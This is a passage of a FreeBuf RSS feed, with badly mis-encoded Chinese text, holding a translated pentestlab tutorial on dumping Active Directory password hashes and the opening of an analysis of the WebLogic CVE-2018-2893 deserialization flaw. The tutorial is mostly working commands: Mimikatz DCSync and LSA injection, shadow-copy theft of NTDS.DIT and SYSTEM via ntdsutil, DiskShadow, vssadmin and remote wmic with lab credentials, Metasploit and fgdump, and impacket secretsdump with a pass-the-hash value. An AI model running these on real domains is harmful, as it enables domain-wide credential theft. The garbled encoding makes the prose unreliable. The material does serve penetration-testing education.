1447<p>通过使用/user傿•°æŒ‡å®šåŸŸç”¨æˆ·å,Mimikatzä¼šå°†è¯¥æŒ‡å®šç”¨æˆ·çš„æ‰€æœ‰å¸æˆ·ä¿¡æ¯è½¬å‚¨åŒ…括哈希值。</p>
1448<pre><code>lsadump::dcsync /domain:pentestlab.local /user:test</code></pre>
1449<p><img alt="2mimikatz-dump-user-hash-via-dcsync.png" src="http://image.3001.net/images/20180717/15317924352096.png!small" width="690" height="418"></p>
1450<p>或者我们å¯ä»¥ç›´æŽ¥åœ¨åŸŸæŽ§åˆ¶å™¨ä¸æ‰§è¡ŒMimikatz,通过lsass.exe进程dump密ç 哈希。</p>
1451<pre><code>privilege::debug
1452lsadump::lsa /inject</code></pre>
1453<p><img alt="3mimikatz-dump-domain-hashes-via-lsass.png" src="http://image.3001.net/images/20180717/15317924519930.png!small" width="690" height="332"></p>
1454<p>æ¤æ—¶ï¼Œå°†ä¼šæ£€ç´¢åŸŸç”¨æˆ·çš„密ç 哈希值。</p>
1455<p><img alt="4mimikatz-dump-domain-hashes-via-lsadump.png" src="http://image.3001.net/images/20180717/15317924665110.png!small" width="690" height="456"></p>
1456<h2>Empire</h2>
1457<p>PowerShell Empire有两个模å—,å¯ä»¥é€šè¿‡DCSync攻击检索域哈希。 这两个模å—都需è¦ä»¥åŸŸç®¡ç†å‘˜çš„æƒé™æ‰§è¡Œï¼Œå¹¶ä¸”他们都使用Microsoftå¤åˆ¶æœåŠ¡ã€‚è¿™ä¸¤ä¸ªæ¨¡å—ä¾èµ–于Invoke-Mimikatz PowerShellè„šæœ¬ï¼Œæ¥æ‰§è¡Œä¸ŽDCSync相关的Mimikatz命令。以下模å—的哈希æå–æ ¼å¼ç±»ä¼¼äºŽMetasploit hashdumpçš„è¾“å‡ºæ ¼å¼ã€‚</p>
1458<pre><code>usemodule credentials/mimikatz/dcsync_hashdump</code></pre>
1459<p><img alt="5empire-dcsync-hashdump-module-clean.png" src="http://image.3001.net/images/20180717/15317924824346.png!small" width="690" height="334"></p>
1460<p>DCSync模å—éœ€è¦æˆ‘们指定用户,以æå–叿ˆ·çš„æ‰€æœ‰ä¿¡æ¯ã€‚</p>
1461<p><img alt="6empire-dcsync-module.png" src="http://image.3001.net/images/20180717/15317924962007.png!small" width="690" height="127"></p>
1462<p>执行完æˆåŽï¼Œæˆ‘们将获å–到以下信æ¯ï¼š</p>
1463<p><img alt="7empire-dcsync-account-information.png" src="http://image.3001.net/images/20180717/15317925119606.png!small" width="690" height="390"></p>
1464<h2>Nishang</h2>
1465<p><a href="https://github.com/samratashok/nishang" ref="">Nishang</a>是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载è·çš„一个集åˆï¼Œå¹¶è¢«å¹¿æ³›åº”ç”¨äºŽæ¸—é€æµ‹è¯•çš„å„个阶段。<a href="https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1">Copy-VSS</a>脚本å¯ç”¨äºŽè‡ªåŠ¨åŒ–çš„æå–需è¦çš„æ–‡ä»¶ï¼šNTDS.DIT,SAMå’ŒSYSTEM。这些文件将被æå–到当å‰çš„å·¥ä½œç›®å½•æˆ–ä½ æŒ‡å®šçš„æ–‡ä»¶å¤¹ä¸ã€‚</p>
1466<pre><code>Import-Module .\Copy-VSS.ps1
1467Copy-VSS
1468Copy-VSS -DestinationDir C:\ShadowCopy\</code></pre>
1469<p><img alt="8nishang-extract-ntds-powershell.png" src="http://image.3001.net/images/20180717/15317925283326.png!small" width="682" height="164"></p>
1470<p>或者,å¯ä»¥é€šè¿‡åŠ è½½PowerShell扩展,æ¥ä»ŽçŽ°æœ‰çš„Meterpreter会è¯ä¸æ‰§è¡Œè„šæœ¬ã€‚</p>
1471<pre><code>load powershell
1472powershell_import /root/Copy-VSS.ps1
1473powershell_execute Copy-VSS</code></pre>
1474<p><img alt="9nishang-extract-ntds-meterpreter.png" src="http://image.3001.net/images/20180717/15317925446597.png!small" width="627" height="185"></p>
1475<p>也å¯ä»¥ä½¿ç”¨powershell_shell命令建立一个PowerShell会è¯ï¼Œé€šè¿‡å¯¼å…¥è„šæœ¬æ¥æå–æ–‡ä»¶ã€‚</p>
1476<pre><code>Copy-VSS
1477Copy-VSS -DestinationDir C:\Ninja</code></pre>
1478<h2><img alt="10nishang-extract-ntds-meterpreter-powershell.png" src="http://image.3001.net/images/20180717/15317925605860.png!small" width="574" height="167"></h2>
1479<h2>PowerSploit</h2>
1480<p>PowerSploit包å«PowerShell脚本,该脚本使用å·å½±å¤åˆ¶æœåŠ¡åˆ›å»ºå¯ç”¨äºŽæå–文件的新å·ã€‚</p>
1481<pre><code>Import-Module .\VolumeShadowCopyTools.ps1
1482New-VolumeShadowCopy -Volume C:\
1483Get-VolumeShadowCopy </code></pre>
1484<p><img alt="11powersploit-volumeshadowcopytools.png" src="http://image.3001.net/images/20180717/15317925786162.png!small" width="690" height="164"></p>
1485<p>æˆ–è€…é€šè¿‡åŠ è½½PowerShell扩展,从现有的Meterpreter会è¯ä¸æ‰§è¡Œã€‚</p>
1486<pre><code>powershell_shell
1487New-VolumeShadowCopy -Volume C:\
1488Get-VOlumeShadowCopy
1489</code></pre>
1490<p><img alt="12powersploit-volume-shadow-copy.png" src="http://image.3001.net/images/20180717/15317925968586.png!small" width="641" height="129"></p>
1491<p>å¯ä»¥ä½¿ç”¨copy命令将文件从新å·å¤åˆ¶åˆ°ç›®æ ‡ã€‚</p>
1492<h2>Invoke-DCSync</h2>
1493<p><a href="https://gist.github.com/monoxgas/9d238accd969550136db">Invoke-DCSync</a>是一个由<a href="https://twitter.com/monoxgas">Nick Landers</a>å’Œleverages PowerViewå¼€å‘çš„PowerShell脚本,Invoke-ReflectivePEInjectionå’ŒPowerKatcher使用Mimikatzçš„DCSyncæ–¹æ³•æ¥æ£€ç´¢å“ˆå¸Œå€¼ã€‚直接执行该函数将生æˆä»¥ä¸‹è¾“出:</p>
1494<pre><code>Invoke-DCSync</code></pre>
1495<p><img alt="13invoke-dcsync-powershell.png" src="http://image.3001.net/images/20180717/15317926624115.png!small" width="583" height="101"></p>
1496<p>å¯ä»¥çœ‹åˆ°ç»“æžœæ˜¯ä»¥è¡¨æ ¼çš„å½¢å¼è¾“å‡ºçš„ã€‚å¦‚æžœæˆ‘ä»¬æ·»åŠ -PWDumpFormat傿•°ï¼Œåˆ™è¾“å‡ºæ ¼å¼ä¸ºuser:id:lm:ntlm:::</p>
1497<pre><code>Invoke-DCSync -PWDumpFormat</code></pre>
1498<p><img alt="14invoke-dcsync-powershell-pwdump-format.png" src="http://image.3001.net/images/20180717/15317926836808.png!small" width="690" height="128"></p>
1499<p>从现有的Meterpreter会è¯ä¸è¿è¡Œè„šæœ¬ï¼Œå¯ä»¥èŽ·å–到相åŒçš„输出结果。</p>
1500<p><img alt="15invoke-dcsync-metasploit.png" src="http://image.3001.net/images/20180717/15317927003910.png!small" width="690" height="168"></p>
1501<p>æ·»åŠ -PWDumpFormat傿•°åŽï¼š</p>
1502<p><img alt="16invoke-dcsync-metasploit-pwdump-format.png" src="http://image.3001.net/images/20180717/15317927147707.png!small" width="690" height="106"></p>
1503<h2>ntdsutil</h2>
1504<p>ntdsutil是一个命令行工具,是域控制器生æ€ç³»ç»Ÿçš„一部分,其主è¦ç”¨é€”是使管ç†å‘˜èƒ½å¤Ÿè½»æ¾è®¿é—®å’Œç®¡ç†Windows Active Directoryæ•°æ®åº“ã€‚ä½†å®ƒå¸¸è¢«æ¸—é€æµ‹è¯•人员或红队队员滥用æ¥èŽ·å–现有的ntds.dit文件快照,并且å¯ä»¥å°†è¯¥æ–‡ä»¶å¤åˆ¶åˆ°æ–°çš„租约ä¸ï¼Œä»¥è¿›è¡Œç¦»çº¿çš„分æžå’Œå¯†ç 哈希的æå–。</p>
1505<pre><code>ntdsutil
1506activate instance ntds
1507ifm
1508create full C:\ntdsutil
1509quit
1510quit</code></pre>
1511<p><img alt="17ntdsutil.png" src="http://image.3001.net/images/20180717/15317929648572.png!small" width="690" height="440"></p>
1512<p>它将为我们生æˆä¸¤ä¸ªæ–°æ–‡ä»¶å¤¹ï¼šActive Directoryå’ŒRegistry。NTDS.DIT文件将被ä¿å˜åˆ°Active Directoryä¸ï¼Œè€ŒSAMå’ŒSYSTEM文件则将被ä¿å˜åˆ°Registry文件夹ä¸ã€‚</p>
1513<p><img alt="18ntdsutil-ntds.png" src="http://image.3001.net/images/20180717/15317929841879.png!small" width="641" height="354"></p>
1514<h2>DiskShadow</h2>
1515<p>DiskShadow是一个Microsoftç¾å二进制文件,用于å助管ç†å‘˜æ‰§è¡Œä¸Žå·å½±å¤åˆ¶æœåŠ¡ï¼ˆVSS)相关的æ“作。这个二进制文件有两个模å¼interactiveå’Œscript ,脚本将包å«è‡ªåŠ¨æ‰§è¡ŒNTDS.DITæå–过程所需的所有命令。我们å¯ä»¥åœ¨è„šæœ¬æ–‡ä»¶ä¸æ·»åŠ ä»¥ä¸‹è¡Œï¼Œä»¥åˆ›å»ºæ–°çš„volume shadow copy(å·å½±å¤åˆ¶ï¼‰ï¼ŒæŒ‚载新驱动,执行å¤åˆ¶å‘½ä»¤ä»¥åŠåˆ 除volume shadow copy。</p>
1516<pre><code>set context persistent nowriters
1517add volume c: alias someAlias
1518create
1519expose %someAlias% z:
1520exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
1521delete shadows volume %someAlias%
1522reset</code></pre>
1523<p>éœ€è¦æ³¨æ„的是,DiskShadow二进制文件需è¦ä»ŽC:\Windows\System32è·¯å¾„æ‰§è¡Œã€‚å¦‚æžœä»Žå…¶å®ƒè·¯å¾„è°ƒç”¨å®ƒï¼Œè„šæœ¬å°†æ— æ³•æ£ç¡®æ‰§è¡Œã€‚</p>
1524<pre><code>diskshadow.exe /s c:\diskshadow.txt</code></pre>
1525<p><img alt="19diskshadow.png" src="http://image.3001.net/images/20180717/1531793011813.png!small" width="690" height="429"></p>
1526<p>直接从解释器è¿è¡Œä»¥ä¸‹å‘½ä»¤ï¼Œå°†åˆ—出系统的所有å¯ç”¨volume shadow copy。</p>
1527<pre><code>diskshadow
1528LIST SHADOWS ALL</code></pre>
1529<p><img alt="20diskshadow-retrieve-shadow-copies.png" src="http://image.3001.net/images/20180717/153179304324.png!small" width="690" height="304"></p>
1530<p>SYSTEM注册表hive也应该被å¤åˆ¶ï¼Œå› 为其包å«äº†è§£å¯†NTDS文件内容所需的密钥。</p>
1531<pre><code>reg.exe save hklm\system c:\exfil\system.bak
1532</code></pre>
1533<h2><img alt="21diskshadow-copy-system-from-registry.png" src="http://image.3001.net/images/20180717/15317930654338.png!small" width="690" height="309"></h2>
1534<h2>WMI</h2>
1535<p><a href="https://twitter.com/PyroTek3">Sean Metcalf</a>在他的åšå®¢ä¸è¯æ˜Žï¼Œå¯ä»¥é€šè¿‡WMI远程æå–NTDS.DITå’ŒSYSTEM文件。该项技术利用vssadmin二进制文件æ¥åˆ›å»ºå·å½±å¤åˆ¶ã€‚</p>
1536<pre><code>wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
1537</code></pre>
1538<p><img alt="22wmi-create-volume-shadow-copy.png" src="http://image.3001.net/images/20180717/15317930866708.png!small" width="690" height="199"></p>
1539<p>ç„¶åŽï¼Œå®ƒå°†è¿œç¨‹æ‰§è¡Œå¤åˆ¶å‘½ä»¤ï¼Œå¹¶å°†å·å½±å¤åˆ¶ä¸çš„NTDS.DIT文件æå–åˆ°ç›®æ ‡ç³»ç»Ÿä¸Šçš„å¦ä¸€ä¸ªç›®å½•ä¸ã€‚</p>
1540<pre><code>wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"</code></pre>
1541<p><img alt="23wmi-copy-ntds-file.png" src="http://image.3001.net/images/20180717/15317931062602.png!small" width="690" height="217"></p>
1542<p>è¿™ä¹ŸåŒæ ·é€‚用于SYSTEM文件。</p>
1543<pre><code>wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
1544</code></pre>
1545<p><img alt="24wmi-copy-system-file.png" src="http://image.3001.net/images/20180717/15317931277446.png!small" width="690" height="215"></p>
1546<p>之åŽï¼Œè¢«æå–çš„æ–‡ä»¶å°†ä¼šä»ŽåŸŸæŽ§åˆ¶å™¨è¢«ä¼ è¾“åˆ°å¦ä¸€ä¸ªWindows系统,以转储域密ç 哈希值。</p>
1547<pre><code>PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
1548PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp</code></pre>
1549<p><img alt="25wmi-transfer-files-via-copy.png" src="http://image.3001.net/images/20180717/15317931547367.png!small" width="690" height="66"></p>
1550<p>如果已生æˆé»„金票æ®ï¼Œåˆ™å¯ä»¥ä½¿ç”¨å®ƒä»£æ›¿å‡æ®ï¼Œé€šè¿‡Kerberos与域控制器进行身份验è¯ã€‚</p>
1551<h2>vssadmin</h2>
1552<p>volume shadow copy是一个Windows命令行实用程åºï¼Œç®¡ç†å‘˜å¯ä»¥ä½¿ç”¨å®ƒå¤‡ä»½è®¡ç®—机,å·ä»¥åŠæ–‡ä»¶ï¼ˆå³ä½¿æ“作系统æ£åœ¨ä½¿ç”¨è¿™äº›èµ„æºï¼‰ã€‚Volume Shadow Copy作为一个æœåŠ¡è¿è¡Œï¼Œå¹¶è¦æ±‚æ–‡ä»¶ç³»ç»Ÿçš„æ ¼å¼ä¸ºNTFS(默认情况下windowsæ“ä½œç³»ç»Ÿæ–‡ä»¶æ ¼å¼å‡ä¸ºNTFS)。从Windows命令æç¤ºç¬¦æ‰§è¡Œä»¥ä¸‹å‘½ä»¤ï¼Œå°†ä¼šåˆ›å»ºä¸€ä¸ªCç›˜çš„å¿«ç…§ï¼Œè¿™æ ·æˆ‘ä»¬å°±å¯ä»¥å°†å…¶å¤åˆ¶åˆ°å¦ä¸€ä¸ªä½ç½®ï¼ˆå¦‚本地文件夹,网络文件夹或å¯ç§»åŠ¨ä»‹è´¨ï¼‰ä»¥èŽ·å–它的访问æƒé™ã€‚</p>
1553<pre><code>vssadmin create shadow /for=C:</code></pre>
1554<p><img alt="26vssadmin-create-volume-shadow-copy.png" src="http://image.3001.net/images/20180717/15317931759208.png!small" width="690" height="260"></p>
1555<p>由于我们已ç»å°†C盘ä¸çš„æ‰€æœ‰æ–‡ä»¶éƒ½å¤åˆ¶åˆ°äº†å¦ä¸€ä¸ªä½ç½®ï¼ˆHarddiskVolumeShadowCopy1ï¼‰ï¼Œå› æ¤å®ƒä»¬ä¸ä¼šè¢«æ“作系统直接使用,我们å¯ä»¥éšæ„访问并å¤åˆ¶å…¶ä¸çš„æ–‡ä»¶ã€‚使用copy命令将NTDS.DITå’ŒSYSTEM文件,å¤åˆ¶åˆ°æœ¬åœ°å为ShadowCopy的驱动ä¸çš„æ–°å»ºæ–‡ä»¶å¤¹ä¸ã€‚</p>
1556<pre><code>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
1557copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
1558</code></pre>
1559<p><img alt="27copy-files-from-volume-shadow-copy.png" src="http://image.3001.net/images/20180717/15317932001520.png!small" width="690" height="213"></p>
1560<p>我们需è¦å°†è¿™äº›æ–‡ä»¶ä»ŽåŸŸæŽ§åˆ¶å™¨å¤åˆ¶åˆ°å¦ä¸€ä¸ªä¸»æœºä»¥è¿›ä¸€æ¥çš„处ç†ã€‚</p>
1561<p><img alt="28shadowcopy-files.png" src="http://image.3001.net/images/20180717/15317932242812.png!small" width="638" height="351"></p>
1562<h2> vssown</h2>
1563<p><a href="https://twitter.com/lanmaster53">Tim Tomes</a>å¼€å‘了一个与vssadmin类似的实用程åº<a href="https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs">vssown</a>,它å¯ä»¥åˆ›å»ºå’Œåˆ 除å·å½±å¤åˆ¶ï¼Œä»ŽæœªæŒ‚载的å·å½±å¤åˆ¶è¿è¡Œä»»æ„坿‰§è¡Œæ–‡ä»¶ï¼Œä»¥åŠå¯åŠ¨å’Œåœæ¢å·å½±å¤åˆ¶æœåŠ¡ã€‚</p>
1564<pre><code>cscript vssown.vbs /start
1565cscript vssown.vbs /create c
1566cscript vssown.vbs /list
1567cscript vssown.vbs /delete
1568</code></pre>
1569<p><img alt="29vssown-volume-shadow-copy.png" src="http://image.3001.net/images/20180717/15317932449222.png!small" width="690" height="521"></p>
1570<p>所需文件å¯ä»¥ä½¿ç”¨copy命令æ¥å¤åˆ¶ã€‚</p>
1571<pre><code>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\ntds\ntds.dit C:\vssown
1572copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SYSTEM C:\vssown
1573copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SAM C:\vssown</code></pre>
1574<h2><img alt="30vssown-copy-ntds-system-and-sam-files.png" src="http://image.3001.net/images/20180717/15317932699173.png" width="690" height="206"></h2>
1575<h2>Metasploit</h2>
1576<p>Metasploitæ¡†æž¶ä¸æœ‰ä¸€ä¸ªæ¨¡å—,å¯ä»¥é€šè¿‡SMBæœåŠ¡ç›´æŽ¥ä¸ŽåŸŸæŽ§åˆ¶å™¨è¿›è¡Œèº«ä»½éªŒè¯ï¼Œåˆ›å»ºç³»ç»Ÿé©±åŠ¨çš„å·å½±å¤åˆ¶ï¼Œå¹¶å°†NTDS.DITå’ŒSYSTEM hive的副本下载到Metasploit目录ä¸ã€‚这些文件å¯ä»¥ä¸Žimpacketç‰å…¶ä»–工具一起使用,这些工具å¯ç”¨äºŽæ‰§è¡Œæ´»åŠ¨ç›®å½•å¯†ç 哈希值的æå–。</p>
1577<pre><code>auxiliary/admin/smb/psexec_ntdsgrab</code></pre>
1578<p><img alt="31metasploit-ntds-module.png" src="http://image.3001.net/images/20180717/1531793289956.png!small" width="690" height="416"></p>
1579<p>还有一个åŽåˆ©ç”¨æ¨¡å—,å¯ä»¥é“¾æŽ¥åˆ°çŽ°æœ‰çš„Meterpreter会è¯ï¼Œå¹¶é€šè¿‡ntdsutil方法检索域哈希。</p>
1580<pre><code>windows/gather/credentials/domain_hashdump</code></pre>
1581<p><img alt="32metasploit-domain-hashdump.png" src="http://image.3001.net/images/20180717/15317933106984.png!small" width="690" height="394"></p>
1582<p>或者,如果有现æˆçš„到域控制器的Meterpreter会è¯ï¼Œåˆ™å¯ä»¥ä½¿ç”¨hashdump命令。但该方法并ä¸å®‰å…¨ï¼Œå› 为它很有å¯èƒ½ä¼šå¯¼è‡´åŸŸæŽ§åˆ¶å™¨å´©æºƒã€‚</p>
1583<pre><code>hashdump</code></pre>
1584<h2><img alt="33metasploit-hashdump-on-dc.png" src="http://image.3001.net/images/20180717/15317933328094.png!small" width="690" height="184"></h2>
1585<h2>fgdump</h2>
1586<p><a href="http://www.foofus.net/fizzgig/fgdump/fgdump-2.1.0-exeonly.zip">fgdump</a>是一个用于æå–LanManå’ŒNTLM密ç å“ˆå¸Œå€¼çš„å·¥å…·ã€‚å¦‚æžœå·²èŽ·å–æœ¬åœ°ç®¡ç†å‘˜å‡æ®ï¼Œåˆ™å¯ä»¥åœ¨æœ¬åœ°æˆ–远程执行。在执行期间,fgdumpå°†å°è¯•ç¦ç”¨ç³»ç»Ÿä¸Šè¿è¡Œçš„æ€æ¯’è½¯ä»¶ï¼Œå¦‚æžœæˆåŠŸï¼Œåˆ™ä¼šå°†æ‰€æœ‰æ•°æ®å†™å…¥åˆ°ä¸¤ä¸ªæ–‡ä»¶ä¸ã€‚如果å˜åœ¨æ€è½¯ï¼Œåˆ™å»ºè®®æœ€å¥½ä¸è¦ä½¿ç”¨fgdumpæ¥è½¬å‚¨å¯†ç å“ˆå¸Œã€‚å› ä¸ºï¼Œå¤§å¤šæ•°å®‰å…¨å…¬å¸çš„æ€æ¯’è½¯ä»¶ï¼ˆåŒ…æ‹¬Microsoftçš„Windows Defenderï¼‰éƒ½å¯¹å…¶è¿›è¡Œäº†æ ‡è®°ã€‚</p>
1587<pre><code>fgdump.exe</code></pre>
1588<p><img alt="34fgdump-domain-controller.png" src="http://image.3001.net/images/20180717/15317933566861.png!small" width="690" height="446"></p>
1589<p>通过检查.pwdumpæ–‡ä»¶çš„å†…å®¹æ¥æ£€ç´¢å¯†ç 哈希值。</p>
1590<pre><code>type 127.0.0.1.pwdump</code></pre>
1591<h2><img alt="35fgdump-pwdump-file.png" src="http://image.3001.net/images/20180717/15317933796738.png!small" width="690" height="215"></h2>
1592<h2>NTDS 窃å–</h2>
1593<p>Impacket是一组python脚本,å¯ç”¨äºŽæ‰§è¡Œå„ç§ä»»åŠ¡ï¼ŒåŒ…æ‹¬æå–NTDS文件的内容。impacket-secretsdump模å—éœ€è¦æˆ‘们æä¾›SYSTEMå’ŒNTDSæ•°æ®åº“文件。</p>
1594<pre><code>impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
1595</code></pre>
1596<p><img alt="36impacket-extract-ntds-contents.png" src="http://image.3001.net/images/20180717/1531793414377.png!small" width="690" height="279"></p>
1597<p>æ¤å¤–,impacketå¯ä»¥é€šè¿‡ä½¿ç”¨è®¡ç®—æœºå¸æˆ·åŠå…¶å“ˆå¸Œè¿›è¡Œèº«ä»½éªŒè¯ä»ŽNTDS.DIT文件远程转储域密ç 哈希。</p>
1598<pre><code>impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1</code></pre>
1599<p><img alt="37impacket-extract-ntds-contents-remotely.png" src="http://image.3001.net/images/20180717/15317934404899.png!small" width="690" height="347"></p>
1600<p>作为impacket的替代解决方案,<a href="https://github.com/zcgonvh/NTDSDumpEx">NTDSDumpEx</a>二进制文件å¯ä»¥ä»ŽWindowsä¸»æœºä¸æå–域密ç 哈希值。</p>
1601<pre><code>NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive</code></pre>
1602<p><img alt="38ntdsdumpex.png" src="http://image.3001.net/images/20180717/15317934742442.png" width="690" height="294"></p>
1603<p>还有一个shell脚本<a href="https://github.com/LordNem/adXtract">adXtract</a>,å¯å°†ç”¨æˆ·å和密ç 哈希导出为一ç§å¯è¢«å¸¸è§çš„密ç ç ´è§£ç¨‹åºä½¿ç”¨çš„æ ¼å¼ï¼Œä¾‹å¦‚John the Ripperå’ŒHashcat。</p>
1604<pre><code>./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab</code></pre>
1605<p><img alt="39adxtract.png" src="http://image.3001.net/images/20180717/15317935044264.png!small" width="690" height="370"></p>
1606<p>该脚本将所有信æ¯å†™å…¥é¡¹ç›®å称下的å„个文件ä¸ï¼Œå½“æ•°æ®åº“文件NTDS的解密完æˆåŽï¼Œç”¨æˆ·åˆ—表和密ç 哈希值将会导出到控制å°ä¸ã€‚该脚本将为我们æä¾›å¤§é‡æœ‰å…³åŸŸç”¨æˆ·çš„ä¿¡æ¯ï¼Œå¦‚下所示。</p>
1607<p><img alt="40adxtract-list-of-users.png" src="http://image.3001.net/images/20180717/15317935347933.png!small" width="690" height="416"></p>
1608<p>密ç å“ˆå¸Œå°†ä»¥ä¸‹åˆ—æ ¼å¼æ˜¾ç¤ºã€‚</p>
1609<p><img alt="41adxtract-password-hashes.png" src="http://image.3001.net/images/20180717/15317935572218.png!small" width="690" height="364"></p>
1610</p>
1611<p><b style="color: rgb(159, 163, 168);">*å‚è€ƒæ¥æºï¼š<a href="https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/">pentestlab</a>,FBå°ç¼– secist 编译,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1612]]></content:encoded>
1613 <wfw:commentRss>http://www.freebuf.com/articles/system/177764.html/feed</wfw:commentRss>
1614 <slash:comments>0</slash:comments>
1615 </item>
1616 <item>
1617 <title>天èžä¿¡å…³äºŽCVE-2018-2893 WebLogicååºåˆ—åŒ–æ¼æ´žåˆ†æž</title>
1618 <link>http://www.freebuf.com/vuls/178105.html</link>
1619 <comments>http://www.freebuf.com/vuls/178105.html#comments</comments>
1620 <pubDate>Wed, 25 Jul 2018 02:00:53 +0000</pubDate>
1621 <dc:creator>alphalab</dc:creator>
1622 <category><![CDATA[WEB安全]]></category>
1623 <category><![CDATA[æ¼æ´ž]]></category>
1624 <category><![CDATA[weblogic]]></category>
1625 <category><![CDATA[ååºåˆ—化]]></category>
1626
1627 <guid isPermaLink="false">http://www.freebuf.com/?p=178105</guid>
1628 <description><![CDATA[一ã€èƒŒæ™¯ä»‹ç» WebLogic是美国Oracleå…¬å¸å‡ºå“的一个Application Server,确切的说是一个基于JAVA EE架构的ä¸é—´ä»¶, WebLogic是用于开å‘ã€é›†æˆã€éƒ¨ç½²å’Œç®¡ç†å¤§åž‹åˆ†å¸ƒå¼Web应用ã€ç½‘络应用和数æ®åº“应用的Java应用æœåŠ¡å™¨ã€‚ 1.1 æ¼æ´žæè¿° Oracle官方在2018å¹´7月å‘å¸ƒäº†å…³é”®è¡¥ä¸æ›´æ–°ï¼Œå…¶ä¸åŒ…å«äº†Oracle WebLogic Server的一个高å±çš„WebLogicååºåˆ—åŒ–æ¼æ´žï¼Œé€šè¿‡è¯¥æ¼æ´žï¼Œæ”»å‡»è€…å¯ä»¥åœ¨æœªæŽˆæƒçš„æƒ…况下远程执行代ç 。   æ¤æ¼æ´žäº§ç”ŸäºŽWebLogic T3æœåŠ¡ï¼Œå½“å¼€æ”¾WebLogic控制å°ç«¯å£ï¼ˆé»˜è®¤ä¸º7001端å£ï¼‰æ—¶ï¼ŒT3æœåŠ¡ä¼šé»˜è®¤å¼€å¯ï¼Œå› æ¤ä¼šé€ æˆè¾ƒå¤§å½±å“ã€‚ç»“åˆæ›¾ç»çˆ†å‡ºçš„WebLogic WLS ç»„ä»¶æ¼æ´žï¼Œä¸æŽ’é™¤ä¼šæœ‰æ”»å‡»è€…åˆ©ç”¨æ¼æ´žæŒ–矿的å¯èƒ½ï¼Œå› æ¤ï¼Œå»ºè®®å—å½±å“ä¼ä¸šç”¨æˆ·å°½å¿«éƒ¨ç½²é˜²æŠ¤æŽªæ–½ã€‚ 1.2 å—å½±å“的系统版本 WebLogic10.3.6.0 WebLogic12.1.3.0 WebLogic12.2.1.2 WebLogic12.2.1.3 1.3 æ¼æ´žç¼–å· CVE-2018-2893 äºŒã€æ¼æ´žç»†èŠ‚ 这次的WebLogic (CVE-2018-2893)æ¼æ´žå’Œä¹‹å‰çš„JRMPåè®®æ¼æ´ž(CVE-2018-2628)æ¼æ´žæ˜¯åˆ†ä¸å¼€çš„,他是结åˆäº†RMI机制缺陷和JDKååºåˆ—åŒ–æ¼æ´žç»•过了WebLogic黑åå•,所以介ç»è¿™ä¸ªæ¼æ´žä¹‹å‰ï¼Œå…ˆå›žé¡¾ä¸‹ä¹‹å‰çš„æ¼æ´žåˆ©ç”¨é“¾ã€‚ 在CVE-2015-4852 ä¸åˆ©ç”¨çš„æ˜¯Commons Collections 库,主æµçš„两大利用链是TransformedMapå’ŒLazymapï¼Œå…¶å®žä»–ä»¬çš„æ ¸å¿ƒéƒ½æ˜¯ç±»ä¼¼çš„ã€‚ 先拿TransformedMapåšä¸ªä»‹ç»ï¼Œæ ¸å¿ƒæ˜¯å射机制。 å射机制 JAVAå射机制是在è¿è¡Œçжæ€ä¸ï¼Œå¯¹äºŽä»»æ„一个类,都能够知é“这个类的所有属性和方法;对于任æ„一个对象,都能够调用它的任æ„一个方法和属性;这ç§åЍæ€èŽ·å–的信æ¯ä»¥åŠåЍæ€è°ƒç”¨å¯¹è±¡çš„æ–¹æ³•的功能称为Javaè¯è¨€çš„å射机制。 å¯¹åº”å¾—ä»£ç æ˜¯è¿™æ ·,下é¢è¿™æ®µä»£ç å°±å¯ä»¥é€šè¿‡å射调用java.net.URLClassLoader.class,这个类å¯ä»¥æœ¬åœ°æˆ–者远程拉起任æ„çš„jaræ–‡ä»¶ï¼ŒåŒæ—¶ä¸ç”¨ç®¡æ–‡ä»¶ååŽç¼€ï¼Œç›´æŽ¥è¯»å–二进制的jar文件。下é¢è¿™ä¸ªæ˜¯æ‹‰èµ·äº†ä¸€ä¸ªåå¼¹Shell功能的jar文件。 ç„¶åŽå†æ¥çœ‹çœ‹æ ¸å¿ƒçš„å射方法,InvokerTransformerä¸çš„transform方法。这个方法就是实现执行任æ„ç±»çš„æ ¸å¿ƒæ–¹æ³•ï¼Œä½†æ˜¯å¿…é¡»éœ€è¦é€šè¿‡ååºåˆ—化的方å¼è°ƒç”¨è¿™ä¸ªæ–¹æ³•。那么是如何调用的呢? 在TransformedMap䏿œ‰ä¸‰ä¸ªæ–¹æ³•调用了transform方法 下é¢å°±æ˜¯æ‰¾åˆ°è°è°ƒç”¨äº†è¿™3个方法ä¸çš„一个,å¯ä»¥çœ‹åˆ°TransformdMap继承了父类,所有的类都实现了åºåˆ—化接å£ï¼Œä¸ç„¶æ— 法ååºåˆ—化,这个ä¸å†é‡å¤å¼ºè°ƒ 跟进这个父类 